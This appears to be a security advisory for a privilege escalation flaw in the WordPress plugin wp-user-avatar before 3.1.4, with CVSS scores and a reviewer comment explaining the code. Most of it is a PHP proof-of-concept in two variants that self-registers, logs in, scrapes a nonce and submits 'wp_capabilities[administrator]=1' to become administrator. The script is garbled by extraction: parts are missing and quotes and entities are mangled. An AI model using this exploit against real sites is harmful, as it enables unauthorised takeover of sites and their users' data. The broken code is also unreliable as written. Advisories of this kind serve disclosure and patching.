8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
The user profile update functionality of the plugin (the `pp_ajax_editprofile` admin-ajax action exercised by the proof of concept below) accepted arbitrary user meta keys supplied in the request and saved them during a profile update, including `wp_capabilities`. Any authenticated user could therefore include `wp_capabilities[administrator]=1` in an otherwise ordinary profile update and escalate their privileges to those of an administrator. The PoC first self-registers an account via `pp_ajax_signup`, which assumes registration is enabled on the target; the escalation step itself only requires a logged-in account. Versions prior to 3.1.4 are affected (see the version table below).
/*
 * NOTE(review): proof-of-concept as extracted from the advisory. It is PHP
 * (not C, despite the file's language hint) and, as shown here, it is
 * incomplete and not runnable — the extractor swallowed text that looked like
 * HTML tags and collapsed the script onto a single line:
 *   - the `<?php` opener, the `$wp_url` / `$proxy` assignments, the first
 *     curl_init()/curl_setopt() calls and the array key preceding the first
 *     'Hax0r3' value (presumably the signup username) are missing;
 *   - everything between `value="Save Changes">` and the next 'Hax0r3' is
 *     missing — presumably the rest of that regex and the `$wpnonce` capture,
 *     plus the curl setup for the final request (TODO: confirm against the
 *     original advisory before relying on it);
 *   - the curly quotes are rendering artefacts for ' and ", the
 *     `[email protected]` values are the extractor's e-mail obfuscation, and
 *     `&login;_password` is almost certainly `&login_password` with a `;`
 *     inserted by entity handling;
 *   - because the line breaks are gone, each `//Nonce` line comment now
 *     swallows everything after it on the line — restore the breaks first.
 * What the visible code does: registers a user via the pp_ajax_signup
 * admin-ajax action, logs in via pp_ajax_login into a curl cookie jar, fetches
 * /account/edit-profile/ to scrape a "nonce" value from the page, then posts a
 * profile update that also carries `'wp_capabilities[administrator]' => '1'`
 * — that extra meta key is the whole exploit. The second variant (after "or")
 * differs only in the final POST: it drops `'action' => 'pp_ajax_editprofile'`
 * and adds `'eup_submit' => '1'`; the target URL of that request was lost, so
 * it presumably posts the profile form directly rather than via admin-ajax —
 * verify against the original.
 */
‘Hax0r3’, ‘reg_email’ => ‘[email protected]’, ‘reg_password’ => ‘password’, ‘reg_password_present’ => ‘true’, ‘reg_first_name’ => ‘Hax0r3’, ‘reg_last_name’ => ‘hack’, ‘action’ => ‘pp_ajax_signup’, ‘melange_id’ => ‘’, ]); $output = curl_exec($ch); curl_close($ch); print_r($output); echo “Log in as newly created user”; $ch = curl_init(); $cookiejar = tempnam(sys_get_temp_dir(), ‘cookiejar-’); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/admin-ajax.php’); curl_setopt( $ch, CURLOPT_PROXY, $proxy ); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ ‘action’ => ‘pp_ajax_login’, ‘data’ => ‘login_username=hax0r3&login;_password=password’ ]); $output = curl_exec($ch); curl_close($ch); print_r($output); //Nonce $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/account/edit-profile/’); curl_setopt( $ch, CURLOPT_PROXY, $proxy ); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); //Nonce preg_match(‘/“nonce”:“([^”]+)"/’, $content, $matches); $nonce = $matches[1]; preg_match(‘/value=“Save Changes”> ‘Hax0r3’, ‘eup_email’ => ‘[email protected]’, ‘eup_first_name’ => ‘Hax0r3’, ‘eup_nickname’ => ‘Hax0r’, ‘eup_display_name’ => ‘Hax0r’, ‘eup_last_name’ => ‘hack’, ‘_wpnonce’ => $wpnonce, ‘nonce’ => $nonce, ‘ppmyac_form_action’ => ‘updateProfile’, ‘action’ => ‘pp_ajax_editprofile’, ‘is_melange’ => ‘true’, ‘wp_capabilities[administrator]’ => ‘1’ ]); $output = curl_exec($ch); curl_close($ch); print_r($output); ?> or ‘Hax0r3’, ‘reg_email’ => ‘[email protected]’, ‘reg_password’ => ‘password’, ‘reg_password_present’ => ‘true’, ‘reg_first_name’ => ‘Hax0r3’, ‘reg_last_name’ => ‘hack’, 
‘action’ => ‘pp_ajax_signup’, ‘melange_id’ => ‘’, ]); $output = curl_exec($ch); curl_close($ch); print_r($output); echo “Log in as newly created user”; $ch = curl_init(); $cookiejar = tempnam(sys_get_temp_dir(), ‘cookiejar-’); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/admin-ajax.php’); curl_setopt( $ch, CURLOPT_PROXY, $proxy ); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ ‘action’ => ‘pp_ajax_login’, ‘data’ => ‘login_username=hax0r3&login;_password=password’ ]); $output = curl_exec($ch); curl_close($ch); print_r($output); //Nonce $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/account/edit-profile/’); curl_setopt( $ch, CURLOPT_PROXY, $proxy ); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); //Nonce preg_match(’/“nonce”:“([^”]+)"/‘, $content, $matches); $nonce = $matches[1]; preg_match(’/value=“Save Changes”> ‘Hax0r3’, ‘eup_email’ => ‘[email protected]’, ‘eup_first_name’ => ‘Hax0r3’, ‘eup_nickname’ => ‘Hax0r’, ‘eup_display_name’ => ‘Hax0r’, ‘eup_last_name’ => ‘hack’, ‘_wpnonce’ => $wpnonce, ‘nonce’ => $nonce, ‘ppmyac_form_action’ => ‘updateProfile’, ‘eup_submit’ => ‘1’, ‘is_melange’ => ‘true’, ‘wp_capabilities[administrator]’ => ‘1’ ]); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>
CPE | Name | Operator | Version |
---|---|---|---|
wp-user-avatar | lt | 3.1.4 |
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P